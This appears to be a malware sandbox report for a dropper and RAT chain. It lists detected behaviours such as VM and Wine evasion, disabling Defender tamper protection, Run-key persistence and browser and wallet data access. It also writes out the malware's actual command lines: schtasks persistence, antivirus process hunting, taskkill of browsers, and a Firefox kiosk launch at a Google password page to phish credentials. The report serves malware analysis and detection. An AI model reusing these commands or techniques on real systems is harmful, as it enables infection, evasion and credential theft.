Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32dac93b2c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\32dac93b2c.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dc0bfa7b6f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\dc0bfa7b6f.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\35d9f5c14a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\35d9f5c14a.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a99fc41bfc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\a99fc41bfc.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4776 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2628 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 4680 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4380 wrote to memory of 3520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4380 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4380 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4380 wrote to memory of 4396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe
PID 4380 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4380 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 5064 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 5064 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 1252 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2628 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe
PID 2628 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe
PID 2628 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe
PID 4776 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe

"C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe

"C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe"

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe

"C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe"

C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe

"C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe"

C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe

"C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

